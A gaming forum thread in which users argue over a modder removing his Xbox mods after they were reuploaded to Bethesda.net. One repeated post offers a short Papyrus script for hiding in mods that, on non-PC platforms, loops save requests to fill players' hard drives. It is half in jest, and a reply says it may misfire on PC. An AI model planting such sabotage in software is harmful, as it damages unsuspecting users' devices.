DDP MY MODS ARE DOWN, COMMENCE ATTACK ON BETHESDAS MAIN PLATFORM

DDProductions83

Actions like this just make you look like an angry 12 year old dude. Cutting off the nose to spite the face

I do get that someone else uploaded your mods to beth net but taking your mods away from the nexus general community is extreme.

I for one will not be downloading any more of your stuff.

So you're basically going to react to him the same way you just accused him of reacting?

• Replies 248
  • Created
  • Last Reply

Top Posters In This Topic

Actions like this just make you look like an angry 12 year old dude. Cutting off the nose to spite the face

I do get that someone else uploaded your mods to beth net but taking your mods away from the nexus general community is extreme.

I for one will not be downloading any more of your stuff.

So you're basically going to react to him the same way you just accused him of reacting?

Not really, his mods now have no support, development or updates. Why should I use them?

Edited by Nixsy

I feel like I really should try to figure out the communication between the client and bethnet. Find out how the downloading of mods works.

And then write a f****** client that allows PC users to DL xbox mods without owning an xbox.

Probably not gonna be able to do it, but I want to try it at least.

You guys seriously think I was done modding? I really thought the fake win 98 background and font would give it away but I guess I'm too unpredictable or some s#*!.

Maybe ppl will think I'm done and I can go mod and my absence will stir up s#*! for me for a few days and I can actually get some damn modding done.

You guys seriously think I was done modding? I really thought the fake win 98 background and font would give it away but I guess I'm too unpredictable or some s***.

Maybe ppl will think I'm done and I can go mod and my absence will stir up s*** for me for a few days and I can actually get some damn modding done.

I don't know, but some might not have noticed that you only deleted the files labeled XBO or XBOX...

I personally don't think you'll leave, you are too much of a modding addict to leave.

But I also would totally understand it if you leave. This situation is just sad.

Put this code in your mods as a precaution against mod theft:

If Debug.GetPlatformName() == "PC"
        ; do nothing
    Else
        While Debug.GetPlatformName() != "PC"
            Game.RequestSave()    ; fill their hard drive to capacity
        EndWhile
   EndIf

Problem solved :)

Put this code in your mods as a precaution against mod theft:

If Debug.GetPlatformName() == "PC"
        ; do nothing
    Else
        While Debug.GetPlatformName() != "PC"
            Game.RequestSave()    ; fill their hard drive to capacity
        EndWhile
   EndIf

Problem solved :smile:

From what I'm aware, GetPlatformName actually returns "" on PC.

You guys seriously think I was done modding? I really thought the fake win 98 background and font would give it away but I guess I'm too unpredictable or some s***.

Maybe ppl will think I'm done and I can go mod and my absence will stir up s*** for me for a few days and I can actually get some damn modding done.

A lot of these thieves and the defenders of thieves have clearly not read any of the EULA found on Bethesda.net that has a section about game mods and how the creator of the mod owns it. Unfortunately even if you beat them upside the head with this information they would probably still say their not stealing anything or anything isn't being stolen.